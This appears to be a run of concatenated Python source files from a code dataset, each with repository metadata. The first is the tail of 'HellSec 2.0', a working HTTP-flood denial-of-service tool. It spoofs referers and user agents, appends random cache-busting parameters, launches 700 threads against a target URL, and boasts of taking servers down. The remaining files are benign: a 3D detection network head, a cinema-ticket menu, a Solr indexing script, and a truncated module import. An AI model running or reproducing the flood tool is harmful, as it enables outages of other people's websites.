headers_referers.append('http://www.ask.com/web?q=')
headers_referers.append('http://search.lycos.com/web/?q=')
headers_referers.append('http://busca.uol.com.br/web/?q=')
headers_referers.append('http://us.yhs4.search.yahoo.com/yhs/search?p=')
headers_referers.append('http://www.dmoz.org/search/search?q=')
headers_referers.append('http://www.baidu.com.br/s?usm=1&rn=100&wd=')
headers_referers.append('http://yandex.ru/yandsearch?text=')
headers_referers.append('http://www.zhongsou.com/third?w=')
headers_referers.append('http://hksearch.timway.com/search.php?query=')
headers_referers.append('http://find.ezilon.com/search.php?q=')
headers_referers.append('http://www.sogou.com/web?query=')
headers_referers.append('http://api.duckduckgo.com/html/?q=')
headers_referers.append('http://boorow.com/Pages/site_br_aspx?query=')
# generates a Keyword list
def keyword_list():
global keyword_top
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Vageta')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('Ecosistema')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
keyword_top.append('adidas')
keyword_top.append('ask.fm')
keyword_top.append('adele')
keyword_top.append('HaxStroke')
keyword_top.append('Suicide')
keyword_top.append('Sex')
keyword_top.append('Robin Williams')
keyword_top.append('World Cup')
keyword_top.append('Ca Si Le Roi')
keyword_top.append('Ebola')
keyword_top.append('Malaysia Airlines Flight 370')
keyword_top.append('ALS Ice Bucket Challenge')
keyword_top.append('Flappy Bird')
keyword_top.append('Conchita Wurst')
keyword_top.append('ISIS')
keyword_top.append('Frozen')
keyword_top.append('014 Sochi Winter Olympics')
keyword_top.append('IPhone')
keyword_top.append('Samsung Galaxy S5')
keyword_top.append('Nexus 6')
keyword_top.append('Moto G')
keyword_top.append('Samsung Note 4')
keyword_top.append('LG G3')
keyword_top.append('Xbox One')
keyword_top.append('Apple Watch')
keyword_top.append('Nokia X')
keyword_top.append('Ipad Air')
keyword_top.append('Facebook')
keyword_top.append('Anonymous')
keyword_top.append('DJ Bach')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 160)
out_str += chr(a)
return(out_str)
def usage():
print ('HellSec 2.0 - By xS1ender')
print ('')
print ('Usage: HellSec.py (url)')
print ('Example: HellSec.py http://www.google.com/')
print ('Have fun fucking elite\'s servers')
print ('Expect your connection to slow down; This tool is powerful')
print ("\a")
print (\
"""
888 888 888 888 .d8888b.
888 888 888 888 d88P Y88b
888 888 888 888 Y88b.
8888888888 .d88b. 888 888 "Y888b. .d88b. .d8888b
8888888888 d8P Y8b 888 888 "Y88b. d8P Y8b d88P"
888 888 88888888 888 888 "888 88888888 888
888 888 Y8b. 888 888 Y88b d88P Y8b. Y88b.
888 888 "Y8888 888 888 "Y8888P" "Y8888 "Y8888P
""")
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(50,100)))
request.add_header('Keep-Alive', random.randint(110,160))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urlopen(request)
except HTTPError as e:
#print e.code
set_flag(1)
print ('[+] Error 500 - Tango Down!')
code=500
except URLError as e:
#print e.reason
sys.exit()
else:
inc_counter()
urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception as ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+150<request_counter) & (previous!=request_counter):
print ("[+] Successfully sent %d packets - HellSec is here to stay" % (request_counter))
previous=request_counter
if flag==2:
print ("\n[*] Killing the proccess, attack has stopped")
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print ("[*] Engaging Attack")
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(700):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
| [
"noreply@github.com"
] | JOJO123218.noreply@github.com |
5c48292c1a0e15ded45f817f64d7dc0f5106c3a5 | 7dfabdddeb5b8f1628e445cdb6d536958c8bc85b | /pcdet/models/dense_heads/anchor_head_fuse_context_fpn.py | d59a820290723d6120f227037cd95e972f181593 | [
"Apache-2.0"
] | permissive | vehxianfish/SRDAN_Open | d6ba16ebc201c9651fac16bc30f57dc3a740041f | 47c1bd9d2369d8e486b18a7aea220af7324c9011 | refs/heads/master | 2023-08-15T10:36:56.483018 | 2021-09-25T03:35:53 | 2021-09-25T03:35:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,507 | py | import numpy as np
import torch
import torch.nn as nn
from .anchor_head_template import AnchorHeadTemplate
class GradReverse(torch.autograd.Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
return (grad_output * self.lambd)
def grad_reverse(x, lambd):
return GradReverse(lambd)(x)
class AnchorHeadFuseContextFPN(AnchorHeadTemplate):
def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, predict_boxes_when_training=True, nusc=False, input_channels_fpn=None, num_fpn_up=0, num_fpn_downup=0, fpn_layers=[], **kwargs):
super().__init__(
model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,
predict_boxes_when_training=predict_boxes_when_training, nusc=nusc,num_fpn_up=num_fpn_up, num_fpn_downup=num_fpn_downup, fpn_layers=fpn_layers
)
self.num_anchors_per_location = sum(self.num_anchors_per_location)
self.input_channels_fpn = input_channels_fpn
self.context_num = self.num_fpn_up + self.num_fpn_downup
if self.num_fpn_downup > 0:
self.context_num += 1
#256 512
self.context_num += 2 # point context 256*2=512
# print("self.context_num", self.context_num)
###################
if not self.fpn_only:
self.conv_cls = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.num_class,
kernel_size=1
)
self.conv_box = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.box_coder.code_size,
kernel_size=1
)
######## FPN #########
self.conv_cls_fpn = nn.ModuleDict()
self.conv_box_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.num_anchors_per_location_fpn[layer] = sum(self.num_anchors_per_location_fpn[layer]) # 2, 7
self.conv_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.num_class,
kernel_size=1
)# 512 -> 2
self.conv_box_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.box_coder.code_size,
kernel_size=1
)# 512 -> 14
######### dir cls #########
if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:
if not self.fpn_only:
self.conv_dir_cls = nn.Conv2d(
input_channels+self.context_num*256,
self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
self.conv_dir_cls_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256,
self.num_anchors_per_location_fpn[layer] * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
else:
self.conv_dir_cls = None
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = None
self.num_keypoints = 2048#self.model_cfg.NUM_KEYPOINTS
self.point_fc = nn.Sequential(nn.Linear(self.num_keypoints, 512), nn.ReLU(True), nn.Dropout())
# print("USE_DOMAIN_CLASSIFIER", self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None))
if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None):
if not self.fpn_only:
self.domain_pool = nn.AdaptiveAvgPool2d(1)
self.domain_classifier = nn.Sequential(nn.Linear(input_channels+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
self.domain_pool_fpn = nn.ModuleDict()
self.domain_classifier_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.domain_pool_fpn[layer] = nn.AdaptiveAvgPool2d(1)
self.domain_classifier_fpn[layer] = nn.Sequential(nn.Linear(self.input_channels_fpn[layer]+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
# print(f"self.input_channels_fpn[{layer}]+512", self.input_channels_fpn[layer]+512)
#256
self.init_weights()
def init_weights(self):
pi = 0.01
if not self.fpn_only:
nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)
for layer in self.fpn_layers:
nn.init.constant_(self.conv_cls_fpn[layer].bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box_fpn[layer].weight, mean=0, std=0.001)
def forward(self, data_dict):
# print("spatial_features_2d", spatial_features_2d.shape) 126
t_mode = data_dict['t_mode']
l = data_dict['l']
if t_mode == 'dom_img_src':
dom_src = True
elif t_mode == 'dom_img_tgt':
dom_src = False
else:
dom_src = None
if 'pseudo' in t_mode:
pseudo = True
else:
pseudo = False
spatial_features_2d = data_dict['spatial_features_2d']
point_features_2d = data_dict['point_features']
# print("spatial_features_2d", spatial_features_2d.shape) # 2,512,126,126
# print("point_features_2d", point_features_2d.shape) # 2,2048
point_features_avg = torch.mean(point_features_2d, -1)
# print("point_features_avg", point_features_avg.shape)
batch_point_features = point_features_avg.view(-1, self.num_keypoints)
x_pool_point = self.point_fc(batch_point_features)
################# DOM #################
if 'dom_img' in t_mode and not self.fpn_only:
x_pool = self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)
x_pool_joint = torch.cat((x_pool, x_pool_point),dim=-1)
x_reverse = grad_reverse(x_pool_joint, l*-1)
dom_head_context = self.domain_classifier[:-2](x_reverse).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict['dom_head_context'] = dom_head_context
dom_img_preds = self.domain_classifier[-2:](dom_head_context).squeeze(-1)
self.forward_ret_dict['dom_img_preds'] = dom_img_preds
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo
)
self.forward_ret_dict.update(targets_dict_dom)
##################### DOM FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
if 'dom_img' in t_mode:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
x_pool_fpn = self.domain_pool_fpn[layer](spatial_features_2d_fpn).view(spatial_features_2d_fpn.size(0), -1)
x_pool_joint_fpn = torch.cat((x_pool_fpn, x_pool_point),dim=-1)
x_reverse_fpn = grad_reverse(x_pool_joint_fpn, l*-1)
dom_head_context_fpn = self.domain_classifier_fpn[layer][:-2](x_reverse_fpn).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict[f'dom_head_context_fpn{layer}'] = dom_head_context_fpn
dom_img_preds_fpn = self.domain_classifier_fpn[layer][-2:](dom_head_context_fpn).squeeze(-1)
self.forward_ret_dict[f'dom_img_preds_fpn{layer}'] = dom_img_preds_fpn
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_dom)
########## CLS ################
if 'dom_img_det' in t_mode:
dom_point_context = data_dict['dom_point_context']
dom_head_context_fpn = []
for layer in self.fpn_layers:
dom_head_context_fpn.append(data_dict[f'dom_head_context_fpn{layer}'])
dom_head_context_all = torch.cat(dom_head_context_fpn, dim=1)
if not self.fpn_only:
dom_head_context = data_dict['dom_head_context']
dom_head_context_all = torch.cat((dom_head_context_all, dom_head_context, dom_point_context), dim=1)
dom_head_context_all_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])
# combine with context
spatial_features_2d_context = torch.cat((spatial_features_2d, dom_head_context_all_reshape), dim=1)
cls_preds = self.conv_cls(spatial_features_2d_context)
box_preds = self.conv_box(spatial_features_2d_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds", cls_preds.shape) # 126, 126, 2
# print("box_preds", box_preds.shape) # 126, 126, 14
self.forward_ret_dict['cls_preds'] = cls_preds
self.forward_ret_dict['box_preds'] = box_preds
if self.conv_dir_cls is not None:
dir_cls_preds = self.conv_dir_cls(spatial_features_2d_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights
)
self.forward_ret_dict.update(targets_dict)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds
)
data_dict['batch_cls_preds'] = batch_cls_preds
data_dict['batch_box_preds'] = batch_box_preds
data_dict['cls_preds_normalized'] = False
else:
dom_head_context_all = torch.cat((dom_head_context_all, dom_point_context), dim=1)
# print("batch_cls_preds", batch_cls_preds)
# print("batch_box_preds", batch_box_preds)
# print("data_dict", data_dict['batch_cls_preds'])
##################### CLS FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
# combine with context
dom_head_context_all_fpn_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d_fpn.shape[-1],spatial_features_2d_fpn.shape[-1])
# combine with context
spatial_features_2d_fpn_context = torch.cat((spatial_features_2d_fpn, dom_head_context_all_fpn_reshape), dim=1)
cls_preds = self.conv_cls_fpn[layer](spatial_features_2d_fpn_context)
box_preds = self.conv_box_fpn[layer](spatial_features_2d_fpn_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds2", cls_preds.shape) # 1, 252, 252, 2
# print("box_preds2", box_preds.shape) # 1, 252, 252, 14
self.forward_ret_dict[f'cls_preds_fpn{layer}'] = cls_preds
self.forward_ret_dict[f'box_preds_fpn{layer}'] = box_preds
if self.conv_dir_cls_fpn[layer] is not None:
dir_cls_preds = self.conv_dir_cls_fpn[layer](spatial_features_2d_fpn_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict[f'dir_cls_preds_fpn{layer}'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict_fpn = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_fpn)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds,
fpn_layer=layer
)
data_dict[f'batch_cls_preds_fpn{layer}'] = batch_cls_preds
data_dict[f'batch_box_preds_fpn{layer}'] = batch_box_preds
data_dict[f'cls_preds_normalized_fpn{layer}'] = False
# print("data_dict fpn", data_dict[f'batch_cls_preds_fpn{layer}'])
# print("self.forward_ret_dict", self.forward_ret_dict)
return data_dict
| [
"zhangweichen2006@gmail.com"
] | zhangweichen2006@gmail.com |
ae0589f75dfaf3d4bd56dd724ab1be86d93211b8 | 568d688fc1ee489ef7fc8a930d917b2c111acd46 | /src/mOps/hello.py | 10ae457b9088d73d4d5d7880c2491e3db88d4d29 | [
"BSD-3-Clause"
] | permissive | verbaros/mOps | fcd7b1ae2e2d647caab614375b8ed88607e9705e | 2e4e6753b0fb802ec3b2aa6e83bc290af16e799c | refs/heads/main | 2023-03-29T11:53:39.856743 | 2021-04-04T13:11:33 | 2021-04-04T13:11:33 | 348,343,272 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 31 | py | def hello(x):
return x * x
| [
"thezaza102@gmail.com"
] | thezaza102@gmail.com |
4d911da096648f2c955c09b37077016ea36e6d17 | b4d334e6495f97fa20e4a19d5546cafab49c36c9 | /src/ProdavacPrikaz.py | eaba9e0e89ca580364da502f9887cd0f9cad5505 | [] | no_license | OMKE/CinemaApp | 892cf35312ca0e23e0fe7a33980bbe496210a2a8 | e58d251e0f52f5e60981fdca5f435d3862c6a4d9 | refs/heads/master | 2020-03-21T14:25:11.507322 | 2018-10-11T23:16:09 | 2018-10-11T23:16:09 | 138,656,235 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 816 | py | import PretragaPrikaz
import Prodavac as Prodavac
def prodavacPrikaz():
print(22 * "-")
print("")
print("1. Pretraga projekcija")
print("2. Prodaja karata")
print("3. Odjava")
print(22 * "-")
print("Unesite broj funkcije")
prodavacNavigacija()
def prodavacNavigacija():
netacanInput = True
while netacanInput:
try:
unosFunkcije = int(input())
netacanInput = False
except ValueError:
print("Unos rijeci nije dozvoljen, pokusajte ponovo")
netacanInput = True
if netacanInput == False:
if unosFunkcije == 1:
PretragaPrikaz.pretragaPrikaz()
elif unosFunkcije == 2:
Prodavac.prodajaKarti()
elif unosFunkcije == 3:
quit()
| [
"noisewavehd@gmail.com"
] | noisewavehd@gmail.com |
46004d74bd264a0af3e6a4f53f89730bc658e2bd | b8e3d0b261416f62c2a8ee5b6e249436e2e61c74 | /replace_vsm.py | f05838ae43a9d4118c9677d4b9f638cb52ff79b9 | [] | no_license | iamchetry/Evaluate-IR-Models | 370628f6ff67b0a82e064a33b6b46182a2cfa8ab | cf67f389fb8e7658603e3e7e9f27298209d61d84 | refs/heads/main | 2023-09-04T12:09:20.415191 | 2021-11-06T16:45:49 | 2021-11-06T16:45:49 | 424,779,087 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,503 | py | import os
import pysolr
import requests
import json
CORE_NAME = "project3_VSM"
AWS_IP = "localhost"
def delete_core(core=CORE_NAME):
print(os.system('sudo su - solr -c "/opt/solr/bin/solr delete -c {core}"'.format(core=core)))
def create_core(core=CORE_NAME):
print(os.system(
'sudo su - solr -c "/opt/solr/bin/solr create -c {core} -n data_driven_schema_configs"'.format(
core=core)))
class Indexer:
def __init__(self):
self.solr_url = f'http://{AWS_IP}:8983/solr/'
self.connection = pysolr.Solr(self.solr_url + CORE_NAME, always_commit=True, timeout=5000000)
def do_initial_setup(self):
delete_core()
create_core()
def create_documents(self, docs):
self.connection.add(docs)
def retrieve(self):
return self.connection.search(q='Assad und ISIS auf dem Vormarsch',
**{'defType': 'dismax',
'qf': 'text_en text_de text_ru',
'indent': 'true',
'fl': 'id,score',
'rows': '20',
'wt': 'json'})
def add_fields(self):
data = {
"add-field": [
{
"name": "lang",
"type": "string",
"multiValued": False
},
{
"name": "text_de",
"type": "text_general",
"multiValued": False
}, {
"name": "text_en",
"type": "text_general",
"multiValued": False
},
{
"name": "text_ru",
"type": "text_general",
"multiValued": False
},
{
"name": "tweet_urls",
"type": "strings",
"multiValued": True
},
{
"name": "tweet_hashtags",
"type": "strings",
"multiValued": True
}
]
}
requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
def replace_fields(self):
data = {
"replace-field": [
{
"name": "age",
"type": "string",
"multiValued": False
}
]
}
requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
def replace_VSM(self):
data = {
"replace-field-type": [
{
'name': 'text_en',
'class': 'solr.TextField',
'positionIncrementGap': '100',
'indexAnalyzer': {
'tokenizer': {
'class': 'solr.StandardTokenizerFactory'
},
'filters': [{
'class': 'solr.StopFilterFactory',
'words': 'lang/stopwords_en.txt',
'ignoreCase': 'true'
}, {
'class': 'solr.LowerCaseFilterFactory'
}, {
'class': 'solr.EnglishPossessiveFilterFactory'
}, {
'class': 'solr.KeywordMarkerFilterFactory',
'protected': 'protwords.txt'
}, {
'class': 'solr.PorterStemFilterFactory'
}]
},
'similarity': {
'class': 'solr.ClassicSimilarityFactory'
},
'queryAnalyzer': {
'tokenizer': {
'class': 'solr.StandardTokenizerFactory'
},
'filters': [{
'class': 'solr.SynonymGraphFilterFactory',
'expand': 'true',
'ignoreCase': 'true',
'synonyms': 'synonyms.txt'
}, {
'class': 'solr.StopFilterFactory',
'words': 'lang/stopwords_en.txt',
'ignoreCase': 'true'
}, {
'class': 'solr.LowerCaseFilterFactory'
}, {
'class': 'solr.EnglishPossessiveFilterFactory'
}, {
'class': 'solr.KeywordMarkerFilterFactory',
'protected': 'protwords.txt'
}, {
'class': 'solr.PorterStemFilterFactory'
}]
}
}, {
'name': 'text_ru',
'class': 'solr.TextField',
'positionIncrementGap': '100',
'analyzer': {
'tokenizer': {
'class': 'solr.StandardTokenizerFactory'
},
'filters': [{
'class': 'solr.LowerCaseFilterFactory'
}, {
'class': 'solr.StopFilterFactory',
'format': 'snowball',
'words': 'lang/stopwords_ru.txt',
'ignoreCase': 'true'
}, {
'class': 'solr.SnowballPorterFilterFactory',
'language': 'Russian'
}]
},
'similarity': {
'class': 'solr.ClassicSimilarityFactory'
},
}, {
'name': 'text_de',
'class': 'solr.TextField',
'positionIncrementGap': '100',
'analyzer': {
'tokenizer': {
'class': 'solr.StandardTokenizerFactory'
},
'filters': [{
'class': 'solr.LowerCaseFilterFactory'
}, {
'class': 'solr.StopFilterFactory',
'format': 'snowball',
'words': 'lang/stopwords_de.txt',
'ignoreCase': 'true'
}, {
'class': 'solr.GermanNormalizationFilterFactory'
}, {
'class': 'solr.GermanLightStemFilterFactory'
}]
},
'similarity': {
'class': 'solr.ClassicSimilarityFactory'
},
}
]
}
requests.post(self.solr_url + CORE_NAME + "/schema", json=data).json()
if __name__ == "__main__":
with open('train.json', encoding='utf-8') as f:
collection = json.load(f)
i = Indexer()
i.do_initial_setup()
i.replace_VSM()
i.add_fields()
i.create_documents(collection)
| [
"nirajchetry123@gmail.com"
] | nirajchetry123@gmail.com |
d146abd0ce416e7ed962725d433481917c4eff94 | 636743ea912b7a88efe99e8b2e642f38ed4ed588 | /tests/spam/__main__.py | 5c977b29a6845feceabf84db09f6317be2309b85 | [
"MIT"
] | permissive | anxuae/setuptools-cythonize | e1ad04b71cf652022133b27612b9233bb552ce9e | 11d16bf09bf8d779cdfc2232ff5e72fa7482f8ca | refs/heads/master | 2023-03-09T11:25:49.529571 | 2023-02-23T10:01:06 | 2023-02-23T10:01:06 | 171,926,063 | 40 | 11 | MIT | 2022-08-08T20:18:50 | 2019-02-21T18:47:47 | Python | UTF-8 | Python | false | false | 56 | py | # -*- coding: utf-8 -*-
from . import ham
ham.main()
| [
"anxuae-prog@yahoo.fr"
] | anxuae-prog@yahoo.fr |
36967479d5f75a1c249097eadad1d5a82ddaa0c1 | 86446de4615ad079d379215fc579191734530a2b | /models/networks/__init__.py | f2a1ade9fb0e6b56998d4ca7e4c0caff65780800 | [] | no_license | devhliu/PerfusionCT-Net | 6ac7a8c7040073f00d58e807049171316a541130 | a1e1311b7c1524b94628d554df3149fdf2b168ff | refs/heads/main | 2023-03-11T09:00:27.770804 | 2020-12-18T09:13:29 | 2020-12-18T09:13:29 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,175 | py | from .unet_2D import *
from .unet_3D import *
from .unet_nonlocal_2D import *
from .unet_nonlocal_3D import *
from .unet_grid_attention_3D import *
from .unet_pCT_multi_att_dsv_3D import *
from .unet_pCT_bayesian_multi_att_dsv_3D import *
from .unet_pCT_cascading_bayesian_multi_att_dsv_3D import *
from .unet_pCT_multi_att_dsv_with_2fconv_3D import *
def get_network(name, n_classes, in_channels=3, feature_scale=4, tensor_dim='2D',
